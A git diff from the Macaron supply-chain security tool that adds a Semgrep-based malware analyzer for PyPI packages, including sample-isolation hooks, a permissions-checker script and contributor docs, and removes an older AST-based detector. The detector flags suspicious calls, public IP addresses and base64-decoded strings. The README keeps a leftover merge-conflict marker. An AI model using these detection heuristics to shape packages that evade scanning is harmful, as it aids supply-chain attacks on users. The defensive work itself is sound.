diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index bc55cb969..034608f19 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -30,6 +30,7 @@ repos: - id: isort name: Sort import statements args: [--settings-path, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Add Black code formatters. - repo: https://github.com/ambv/black @@ -38,6 +39,7 @@ repos: - id: black name: Format code args: [--config, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* - repo: https://github.com/asottile/blacken-docs rev: 1.19.1 hooks: @@ -65,6 +67,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: [flake8-bugbear==22.10.27, flake8-builtins==2.0.1, flake8-comprehensions==3.10.1, flake8-docstrings==1.6.0, flake8-mutable==1.2.0, flake8-noqa==1.4.0, flake8-pytest-style==1.6.0, flake8-rst-docstrings==0.3.0, pep8-naming==0.13.2] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--config, .flake8] # Check GitHub Actions workflow files. @@ -82,6 +85,7 @@ repos: entry: pylint language: python files: ^src/macaron/|^tests/ + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* types: [text, python] args: [--rcfile, pyproject.toml] @@ -94,6 +98,7 @@ repos: language: python files: ^src/macaron/|^tests/ types: [text, python] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--show-traceback, --config-file, pyproject.toml] # Check for potential security issues. @@ -106,6 +111,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: ['bandit[toml]'] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Enable a whole bunch of useful helper hooks, too. # See https://pre-commit.com/hooks.html for more hooks. @@ -197,6 +203,18 @@ repos: always_run: true pass_filenames: false +# Checks that tests/malware_analyzer/pypi/resources/sourcecode_samples files do not have executable permissions +# This is another measure to make sure the files can't be accidentally executed +- repo: local + hooks: + - id: sourcecode-sample-permissions + name: Sourcecode sample executable permissions checker + entry: scripts/dev_scripts/samples_permissions_checker.sh + language: system + always_run: true + pass_filenames: false + + # A linter for Golang - repo: https://github.com/golangci/golangci-lint rev: v1.64.6 diff --git a/.semgrepignore b/.semgrepignore new file mode 100644 index 000000000..3d53fd964 --- /dev/null +++ b/.semgrepignore @@ -0,0 +1 @@ +# Items added to this file will be ignored by Semgrep. diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 6cc6516fb..3e21b8e57 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -72,6 +72,10 @@ See below for instructions to set up the development environment. - PRs should be merged using the `Squash and merge` strategy. In most cases a single commit with a detailed commit message body is preferred. Make sure to keep the `Signed-off-by` line in the body. +### PyPI Malware Detection Contribution + +Please see the [README for the malware analyzer](./src/macaron/malware_analyzer/README.md) for information on contributing Heuristics and code patterns. + ## Branching model * The `main` branch should be used as the base branch for pull requests. The `release` branch is designated for releases and should only be merged into when creating a new release for Macaron. diff --git a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst index f53afc8d8..50b2b472d 100644 --- a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst +++ b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst @@ -9,6 +9,14 @@ macaron.malware\_analyzer.pypi\_heuristics.sourcecode package Submodules ---------- +macaron.malware\_analyzer.pypi\_heuristics.sourcecode.pypi\_sourcecode\_analyzer module +--------------------------------------------------------------------------------------- + +.. automodule:: macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer + :members: + :undoc-members: + :show-inheritance: + macaron.malware\_analyzer.pypi\_heuristics.sourcecode.suspicious\_setup module ------------------------------------------------------------------------------ diff --git a/pyproject.toml b/pyproject.toml index 6cae94f7a..4fa6b89d5 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -37,6 +37,7 @@ dependencies = [ "beautifulsoup4 >= 4.12.0,<5.0.0", "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", + "semgrep == 1.113.0", ] keywords = [] # https://pypi.org/classifiers/ @@ -120,12 +121,10 @@ Issues = "https://github.com/oracle/macaron/issues" tests = [] skips = ["B101"] - # https://github.com/psf/black#configuration [tool.black] line-length = 120 - # https://github.com/commitizen-tools/commitizen # https://commitizen-tools.github.io/commitizen/bump/ [tool.commitizen] @@ -170,7 +169,6 @@ exclude = [ "SECURITY.md", ] - # https://pycqa.github.io/isort/ [tool.isort] profile = "black" @@ -181,7 +179,6 @@ skip_gitignore = true # https://mypy.readthedocs.io/en/stable/config_file.html#using-a-pyproject-toml [tool.mypy] -# exclude= show_error_codes = true show_column_numbers = true check_untyped_defs = true @@ -209,7 +206,6 @@ module = [ ] ignore_missing_imports = true - # https://pylint.pycqa.org/en/latest/user_guide/configuration/index.html [tool.pylint.MASTER] fail-under = 10.0 @@ -261,6 +257,7 @@ addopts = """-vv -ra --tb native \ --doctest-modules --doctest-continue-on-failure --doctest-glob '*.rst' \ --cov macaron \ --ignore tests/integration \ + --ignore tests/malware_analyzer/pypi/resources/sourcecode_samples \ """ # Consider adding --pdb # https://docs.python.org/3/library/doctest.html#option-flags doctest_optionflags = "IGNORE_EXCEPTION_DETAIL" diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh new file mode 100755 index 000000000..fcbd3658b --- /dev/null +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -0,0 +1,37 @@ +#!/usr/bin/env bash + +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +# +# Checks if the files in tests/malware_analyzer/pypi/resources/sourcecode_samples have executable permissions, +# failing if any do. +# + +# Strict bash options. +# +# -e: exit immediately if a command fails (with non-zero return code), +# or if a function returns non-zero. +# +# -u: treat unset variables and parameters as error when performing +# parameter expansion. +# In case a variable ${VAR} is unset but we still need to expand, +# use the syntax ${VAR:-} to expand it to an empty string. +# +# -o pipefail: set the return value of a pipeline to the value of the last +# (rightmost) command to exit with a non-zero status, or zero +# if all commands in the pipeline exit successfully. +# +# Reference: https://www.gnu.org/software/bash/manual/html_node/The-Set-Builtin.html. +set -euo pipefail + +MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. && pwd)" +SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" + +# any files have any of the executable bits set +executables=$( ( find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x | sed "s|$MACARON_DIR/||"; git ls-files "$SAMPLES_PATH" --full-name) | sort | uniq -d) +if [ -n "$executables" ]; then + echo "The following files should not have any executable permissions:" + echo "$executables" + exit 1 +fi diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index 03549db7f..2833b32af 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -172,8 +172,8 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None analyzer_single_args.sbom_path, deps_depth, provenance_payload=prov_payload, - validate_malware=analyzer_single_args.validate_malware, verify_provenance=analyzer_single_args.verify_provenance, + analyze_source=analyzer_single_args.analyze_source, ) sys.exit(status_code) @@ -477,10 +477,13 @@ def main(argv: list[str] | None = None) -> None: ) single_analyze_parser.add_argument( - "--validate-malware", + "--analyze-source", required=False, action="store_true", - help=("Enable malware validation."), + help=( + "EXPERIMENTAL. For improved malware detection, analyze the source code of the" + + " (PyPI) package using a textual scan and dataflow analysis." + ), ) single_analyze_parser.add_argument( diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index c46e09ce1..41df6ca92 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -600,3 +600,7 @@ major_threshold = 20 epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 + +# absolute path to where a custom set of semgrep rules for source code analysis are stored. These will be included +# with Macaron's default rules. The path will be normalised to the OS path type. +custom_semgrep_rules = diff --git a/src/macaron/errors.py b/src/macaron/errors.py index 34ab1da89..d5983a0bc 100644 --- a/src/macaron/errors.py +++ b/src/macaron/errors.py @@ -109,3 +109,7 @@ class HeuristicAnalyzerValueError(MacaronError): class LocalArtifactFinderError(MacaronError): """Happens when there is an error looking for local artifacts.""" + + +class SourceCodeError(MacaronError): + """Error for operations on package source code.""" diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index d5d30a670..9c083e958 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -1,4 +1,4 @@ -# Implementation of Heuristic Malware Detector +# Implementation of Malware Detector ## PyPI Ecosystem @@ -52,6 +52,17 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Rule**: Return `HeuristicResult.FAIL` if the major or epoch is abnormally high; otherwise, return `HeuristicResult.PASS`. - **Dependency**: Will be run if the One Release heuristic fails. +### Experimental: Source Code Analysis with Semgrep + +The following analyzer has been added in as an experimental feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: + +**PyPI Source Code Analyzer** +- **Description**: Uses Semgrep, with default rules written in `src/macaron/resources/pypi_malware_rules` and custom rules available by supplying a path to `custom_semgrep_rules` in `defaults.ini`, to scan the package `.tar` source code. +- **Rule**: If any Semgrep rule is triggered, the heuristic fails with `HeuristicResult.FAIL` and subsequently fails the package with `CheckResultType.FAILED`. If no rule is triggered, the heuristic passes with `HeuristicResult.PASS` and the `CheckResultType` result from the combination of all other heuristics is maintained. +- **Dependency**: Will be run if the Source Code Repo fails. + +This feature is currently a work in progress, and supports detection of code obfuscation techniques and remote exfiltration behaviors. It uses Semgrep OSS for detection. + ### Contributing When contributing an analyzer, it must meet the following requirements: @@ -59,6 +70,7 @@ When contributing an analyzer, it must meet the following requirements: - The analyzer must be implemented in a separate file, placed in the relevant folder based on what it analyzes ([metadata](./pypi_heuristics/metadata/) or [sourcecode](./pypi_heuristics/sourcecode/)). - The analyzer must inherit from the `BaseHeuristicAnalyzer` class and implement the `analyze` function, returning relevant information specific to the analysis. - The analyzer name must be added to [heuristics.py](./pypi_heuristics/heuristics.py) file so it can be used for rule combinations in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) +- The analyzer must be added to the list of analyzers in `detect_malicious_metadata_check.py` to be run. - Update the `malware_rules_problog_model` in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) with logical statements where the heuristic should be included. When adding new rules, please follow the following guidelines: - Provide a [confidence value](../slsa_analyzer/checks/check_result.py) using the `Confidence` enum. - Ensure it is assigned to the `problog_result_access` string variable, otherwise it will not be queried and evaluated. @@ -66,6 +78,40 @@ When contributing an analyzer, it must meet the following requirements: - Make sure to wrap pass/fail statements in `passed()` and `failed()`. Not doing so may result in undesirable behaviour, see the comments in the model for more details. - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). +**Contributing Code Pattern Rules** + +When contributing more Semgrep rules for `pypi_sourcecode_analyzer.py` to use, the following requirements must be met: + +- Semgrep `.yaml` Rules are stored in `src/macaron/resources/pypi_malware_rules` and are named based on the category of code behaviors they detect. +- If the rule comes under one of the already defined categories, place it within that `.yaml` file, else create a new `.yaml` file using the category name. +- Each rule ID must be prefixed by the category followed by a single underscore ('_'), so for obfuscation rules in `obfuscation.yaml` each rule ID is prefixed with `obfuscation_`, followed by an ID which uses a hiphen ('-') as a separator. +- Tests must be written for each rule contributed. These are stored in `tests/malware_analyzer/pypi/test_pypi_sourcescode_analyzer.py`. +- These tests are written on a per-category bases, running each category individually. Each category must have a folder under `tests/malware_analyzer/pypi/resources/sourcecode_samples`. +- Within these folders, there must be sample code patterns for testing, and a file `expected_results.json` with the expected JSON output of the analyzer for that category. +- Each sample code pattern `.py` file must not have executable permissions and must include code that prevents it from being accidentally imported or run. The current files use this method: + +``` +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() +``` +>>>>>>> ae5a748 (docs: updated README and CONTRIBUTING for information on how to contribute to the malware analyzer) + ### Confidence Score Motivation The original seven heuristics which started this work were Empty Project Link, Unreachable Project Links, One Release, High Release Frequency, Unchange Release, Closer Release Join Date, and Suspicious Setup. These heuristics (excluding those with a dependency) were run on 1167 packages from trusted organizations, with the following results: diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index bd829a0f1..8447a9961 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -37,6 +37,9 @@ class Heuristics(str, Enum): #: Indicates that the package has an unusually large version number for a single release. ANOMALOUS_VERSION = "anomalous_version" + #: Indicates that the package source code contains suspicious code patterns. + SUSPICIOUS_PATTERNS = "suspicious_patterns" + class HeuristicResult(str, Enum): """Result type indicating the outcome of a heuristic.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py deleted file mode 100644 index edf7a1830..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py +++ /dev/null @@ -1,491 +0,0 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -""" -Detect suspicious function calls in the code and trace the arguments back to their original values. - -This allows for deeper analysis of potentially malicious behavior. -""" - -import ast -import base64 -import binascii -import ipaddress -import logging -import os -import pathlib -import re - -import yaml - -from macaron.json_tools import JsonType -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset - -logger: logging.Logger = logging.getLogger(__name__) - - -class DataFlowTracer(ast.NodeVisitor): - """The class is used to create the symbol table and analyze the dataflow.""" - - def __init__(self) -> None: - self.symbol_table: dict = {} # Store variable assignments - self.trace_path: list = [] - - def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Assign node and build the symbol table.""" - for target in node.targets: - if isinstance(target, ast.Name): - target_name = target.id - if isinstance(node.value, ast.Name): - self.symbol_table[target_name] = str(node.value.id) - elif isinstance(node.value, ast.Constant): - self.symbol_table[target_name] = str(node.value.value) - # Handle other assignment types as needed (e.g., function calls, lists) - else: - self.symbol_table[target_name] = ast.unparse(node.value) - self.generic_visit(node) # Important for visiting nested assign - - def trace_back(self, variable_name: str) -> list: - """Get the full path of the dataflow. - - Parameters - ---------- - variable_name: str - The argument of the function call. - - Returns - ------- - list - The path of the dataflow. - """ - self.trace_path = [] - self._recursive_trace(variable_name) - return self.trace_path - - def _recursive_trace(self, variable_name: str) -> None: - """Recursively build the dataflow path by analyzing the symbol table. - - Parameters - ---------- - variable_name: str - The argument of the function call. - """ - if variable_name in self.symbol_table: - value = self.symbol_table[variable_name] - if not self.trace_path: - self.trace_path.extend([variable_name, value]) - else: - self.trace_path.append(value) - if ( - isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value - ): # only trace if it is a var name - self._recursive_trace(value) - - def generate_symbol_table(self, source_code: str) -> None: - """Generate the symbol table. - - Parameters - ---------- - source_code: str - The source code of the script. - """ - tree = ast.parse(source_code) - self.visit(tree) - - -class PyPISourcecodeAnalyzer: - """This class is used to analyze the source code.""" - - def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None: - """Collect required data for analysing the source code.""" - self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode() - self.suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern() - # self.extracted_suspicious_content: dict[str, JsonType] = {} - self.analysis_result: dict = {} - self.is_malware: bool = False - - def analyze(self) -> tuple[bool, dict]: - """Analyze the source code of the PyPI package. - - Returns - ------- - dict - The result of the analysis. - """ - if self.source_code and self.suspicious_pattern: - for filename, content in self.source_code.items(): - try: - imports = self._extract_imports_from_ast(content) - except SyntaxError: - imports = self._extract_imports_from_lines(content) - - if isinstance(self.suspicious_pattern["imports"], list): - suspicious_imports: set[str] | None = imports & set(self.suspicious_pattern["imports"]) - else: - suspicious_imports = None - - # No suspicious imports in the source code. Skip the further steps. - if not suspicious_imports: - logger.debug("No suspicious imports found in the file %s", filename) - continue - - # TODO: Currently the symbol table stores the data for dataflow analysis. - # In the future, the dataflow will be more complicated and even handle the cross-file dataflow. - tracer = DataFlowTracer() - tracer.generate_symbol_table(content) - logger.debug(tracer.symbol_table) - - # TODO: In the future, the probability policy to decide the file is malicious or not - # will be implemented. Therefore, the functioncall_analyzer.analyze() will return detail_info - # and analysis result. - functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - is_malware, detail_info = functioncall_analyzer.analyze(content) - if is_malware: - self.is_malware = is_malware - - # TODO: Currently, the result collector does not handle the situation that - # multiple same filename. In the future, this will be replace with absolute path. - if detail_info: - self.analysis_result[filename] = detail_info - - # TODO: Implement other suspicious setup in suspicious_pattern.yaml - # pattern = r"install_requires\s*=\s*\[(.*?)\]" - # matches: re.Match | None = re.search(pattern, content, re.DOTALL) - # if matches: - # install_requires: set[str] | None = set(re.findall(r"'(.*?)'", matches.group(1))) - # if ( - # install_requires - # and install_requires & set(self.suspicious_pattern["imports"]) - # and len(install_requires) < 4 - # # This threshold is based on historical malwares - # ): - # extracted_data["install_requires"] = install_requires - # TODO: In the future this result from each file will be used to calculate the probability. - # Then the is_malicious will be based on this value. - # Currently, the default policy is - return self.is_malware, self.analysis_result - - # def extract_susupicious_content(self) -> None: - # """Extract the suspicious content from the source code.""" - # if not self.source_code or not self.suspicious_pattern: - # return - # self.extracted_suspicious_content = self._extract_suspicious_content_from_source() - - def _load_suspicious_pattern(self) -> dict[str, JsonType] | None: - """Load the suspicious pattern from suspicious_pattern.yaml. - - Returns - ------- - dict[str, JsonType] | None - The suspicious pattern. - """ - filename: str = "suspicious_pattern.yaml" - curr_dir: pathlib.Path = pathlib.Path(__file__).parent.absolute() - suspicious_pattern_file: str = os.path.join(curr_dir, filename) - with open(suspicious_pattern_file, encoding="utf-8") as file: - try: - suspicious_pattern: dict[str, JsonType] = yaml.safe_load(file) - except yaml.YAMLError as yaml_exception: - logger.debug("Error parsing the yaml file: '%s'", yaml_exception) - return None - return suspicious_pattern - - def _extract_imports_from_ast(self, content: str) -> set[str]: - """Extract imports from source code using the parsed AST. - - Parameters - ---------- - source_content: str - The source code as a string. - - Returns - ------- - set[str] - The set of imports. - - Raises - ------ - SyntaxError - If the code could not be parsed. - """ - imports = set() - tree = ast.parse(content) - for node in ast.walk(tree): - if isinstance(node, ast.Import): - for alias in node.names: - imports.add(alias.name) - elif isinstance(node, ast.ImportFrom): - module = node.module - if module: - _module = "." * node.level + module - imports.add(_module) - for name in node.names: - imports.add(_module + "." + name.name) - - return imports - - def _extract_imports_from_lines(self, content: str) -> set[str]: - """Extract imports from source code using per line pattern matching. - - Parameters - ---------- - source_content: str - The source code as a string. - - Returns - ------- - set[str] - The list of imports. - """ - alias_pattern = r"\s+as\s+\w+(?:\.{0,1}\w+)*" - # Pattern for module aliases. - - module_name = r"\w+(?:\.{0,1}\w+" - # as described under pattern_import. - - pattern_import = ( - r"(?:import\s+)(" + module_name + r")*(?:" + alias_pattern + r")?" - r"(?:(?:\s*,\s*)(?:" + module_name + r")*(?:" + alias_pattern + r")?))*)(?:(?:\s|#).*)?" - ) - # Allows for a standard import statement. - # E.g.: import - # Where consists of one or more . - # Where consists of one or more words (a-z or 0-9 or underscore) separated by periods, - # with an optional alias. - # Where allows any character(s) either after a single space or a hash (#). - - pattern_from_import = ( - r"(?:from\s+)([.]*" - + module_name - + r")*)(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))" - ) - # Allows for a from import statement. - # E.g.: from import - # Where is as above, but can also be preceded by any number of periods. - # (Note only a single module can be placed here.) - # Where consists of one or more with optional aliases. - # Where is identical to except without any periods. - # Where requires at least one space followed by one or more word characters, plus - # any other characters following on from that. - - combined_pattern = f"^(?:{pattern_import})|(?:{pattern_from_import})$" - # The combined pattern creates two match groups: - # 1 - standard import statement. - # 2 - from import statement module. - # 3 - from import statement module components. - - imports = set() - for line in content.splitlines(): - line.strip() - match = re.match(combined_pattern, line) - if not match: - continue - - if match.group(1): - # Standard import, handle commas and aliases if present. - splits = self._prune_aliased_lines(match.group(1), alias_pattern) - for split in splits: - imports.add(split) - elif match.group(2): - # From import - imports.add(match.group(2)) - if match.group(3): - splits = self._prune_aliased_lines(match.group(3), alias_pattern) - for split in splits: - imports.add(match.group(2) + "." + split) - - return imports - - def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: - """Split the line on commas and remove any aliases from individual parts.""" - results = [] - splits = text.split(",") - for split in splits: - split = split.strip() - results.append(re.sub(alias_pattern, "", split)) - return results - - -class FunctionCallAnalyzer(ast.NodeVisitor): - """This class analyzes Python source code to identify potential suspicious behavior.""" - - def __init__(self, suspicious_pattern: dict, tracer: DataFlowTracer) -> None: - """Initialize the analyzer. - - Parameters - ---------- - suspicious_pattern: dict - The suspicious behaviour mainly includes the function call and constant. - """ - self.suspicious_patterns: dict = suspicious_pattern - self.analysis_detail: dict = { - "OS Detection": {}, - "Code Execution": {}, - "Information Collecting": {}, - "Remote Connection": {}, - "Custom Setup": {}, - "Obfuscation": {}, - } - self.tracer = tracer - self.is_malware = False - - def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit all root node.""" - self.generic_visit(node) - - # TODO: Detect OS might generate false alert. - # def visit_If(self, node: ast.If) -> None: - # """Visit the If node.""" - # if isinstance(node.test, ast.Compare): - # unparsed_expr: str = ast.unparse(node) - # # Some malware excute different malicious code based on the victims OS. - # for os_detection_constant in self.suspicious_patterns["ast_constant"]["os_detection"]: - # if os_detection_constant in unparsed_expr: - # TODO: This function is required to be implemented with dataflow analysis - # self.analysis_detail["OS Detection"][node.lineno] = unparsed_expr - # self.is_malware = True - # self.generic_visit(node) - - def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns["ast_calls"] - suspicious_const: dict = self.suspicious_patterns["ast_constant"] - function_call: str = ast.unparse(node.func) - args: str = " ".join([ast.unparse(arg) for arg in node.args]) - expr: str = ast.unparse(node) - trace_path: list = self.tracer.trace_back(args) - path: str = "" - if trace_path: - path = " ->".join(trace_path) - for call_type in suspicious_calls: - if self._is_malware(suspicious_calls[call_type], function_call): - for constant_type in suspicious_const: # Further confirmed by checking the arguments - if ( - self._is_malware(suspicious_const[constant_type], args) - or IP().extract_public_ipv4(args) - or self._is_malware(suspicious_const[constant_type], Decryptor().base64_decode(args)) - ): - self._summarize_analysis_detail(call_type, node.lineno, expr) - self.is_malware = True - elif self._is_malware(suspicious_const[constant_type], path): - self._summarize_analysis_detail(call_type, node.lineno, expr, path) - self.is_malware = True - self.generic_visit(node) - - def visit_ClassDef(self, node: ast.ClassDef) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the ClassDef node. This function is used to detect malicious behavior in setup.py.""" - if not node.bases: - self.generic_visit(node) - return - - for base in node.bases: - if isinstance(base, ast.Name): - if base.id == "install": - # TODO: Not pretty sure including this in setup.py means it is a malware, so the self.is_malware is not updated. - self.analysis_detail["Custom Setup"][node.lineno] = node.name - self.generic_visit(node) - - def _summarize_analysis_detail( - self, function_call_type: str, lineno: int, expr: str, trace_path: str | None = None - ) -> None: - """Store the analysis result in based on different type of malicious behaviour. - - Parameters - ---------- - function_call_type: str - The suspcious function call type. - lineno: int - The location of the source code block. - expr: str - The source code block. - trace_path: str - The dataflow path. - """ - detail = [expr] - - if trace_path: - detail.append(trace_path) - - match function_call_type: - case "code_execution": - self.analysis_detail["Code Execution"][lineno] = detail - case "info_collecting": - self.analysis_detail["Information Collecting"][lineno] = detail - case "remote_connection": - self.analysis_detail["Remote Connection"][lineno] = detail - case "obfuscation": - self.analysis_detail["Obfuscation"][lineno] = detail - - def _is_malware(self, malicious_pattern: list, target: str | None) -> bool: - """Check the source code matched the suspicious pattern. - - Parameters - ---------- - malicious_pattern: list - A collection of the suspicious source code. - target: str - The componenet of the source code block. - - Returns - ------- - bool - The result. - """ - if not target: - return False - for _ in malicious_pattern: # pylint: disable=C0103, C0501 - if _ in target: - return True - return False - - def analyze(self, source_code: str) -> tuple[bool, dict]: - """Analyze the source code.""" - tree = ast.parse(source_code) - self.visit(tree) - return self.is_malware, self.analysis_detail - - -class Decryptor: - """This class includes multiple built-in decryption methods.""" - - # Only decrypt the string with the built-in decrypt method; otherwise, provide the source code - # for the user. And notify them to decrypt using the corresponding decrypt method - # TODO: Implement more decryption method. - - def __init__(self) -> None: - pass - - def base64_decode(self, encoded_value: str | bytes) -> str | None: - """Decode the encoded value.""" - try: - decoded_bytes = base64.b64decode(encoded_value) - return decoded_bytes.decode("utf-8") - except (binascii.Error, UnicodeDecodeError): - return None - - -class IP: - """This class provides the method to identify the IP in the source code.""" - - def __init__(self) -> None: - pass - - def is_valid_public_ipv4(self, ip: str) -> bool: - """Check whether it is a public IPv4.""" - try: - ip_obj = ipaddress.ip_address(ip) - return ip_obj.version == 4 and not ip_obj.is_private and not ip_obj.is_loopback - except ValueError: - # If ip_address() raises an error, it's not a valid IP - return False - - def extract_public_ipv4(self, text: str) -> list: - """Extract the public IPv4 from the source code.""" - ipv4_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" - all_ips = re.findall(ipv4_pattern, text) - # Filter valid public IPv4 addresses - valid_public_ipv4s = [] - for ip in all_ips: - if self.is_valid_public_ipv4(ip): - valid_public_ipv4s.append(ip) - return valid_public_ipv4s diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..02bad65cd --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -0,0 +1,212 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Detect suspicious function calls in the code and trace the arguments back to their original values. + +This allows for deeper analysis of potentially malicious behavior. +""" + +import json +import logging +import os +import subprocess # nosec +import tempfile + +from macaron.config.defaults import defaults +from macaron.config.global_config import global_config +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.json_tools import JsonType, json_extract +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger: logging.Logger = logging.getLogger(__name__) + + +class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer): + """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. + + Currently the analyzer performs textual pattern matching and dataflow analysis using the open-source features of + Semgrep. Semgrep open-source taint tracking can only perform in one locale, but this is a known limitation. Default + rules are stored in 'macaron/resources/pypi_malware_rules' as semgrep .yaml rule files. A user may add additional + rules stored in a specified directory passed by them in the 'defaults.ini' configuration file. + """ + + def __init__(self, resources_path: str | None = None) -> None: + """ + Initialise the source code analyzer and load default and custom semgrep rulesets. + + Parameters + ---------- + resources_path: str | None + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. If None is provided, then this is loaded from the global config resources path. + Defaults to None + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. + """ + super().__init__( + name="suspicious_patterns_analyzer", + heuristic=Heuristics.SUSPICIOUS_PATTERNS, + # We include the SKIP condition here as we want to consider the case where EMPTY_PROJECT_LINK fails, + # meaning SOURCE_CODE_REPO is skipped, as this is still a scenario where the source code repository + # is not available, so we want to run source code analysis. + depends_on=[ + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL), + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.SKIP), + ], + ) + if resources_path is None: + resources_path = global_config.resources_path + self.default_rule_path, self.custom_rule_path = self._load_defaults(resources_path) + + def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: + """ + Load the default semgrep rules and, if present, the custom semgrep rules provided by the user. + + Semgrep validation is run on the custom rules provided by the user. + + Parameters + ---------- + resources_path: str + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. + + Returns + ------- + tuple[str, str | None] + The default rule path and the custom rule path or None if one was not provided + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. + """ + default_rule_path = os.path.join(resources_path, "pypi_malware_rules") + if not os.path.exists(default_rule_path): + error_msg = f"Error with locating default rule path {default_rule_path}" + logger.debug(error_msg) + raise 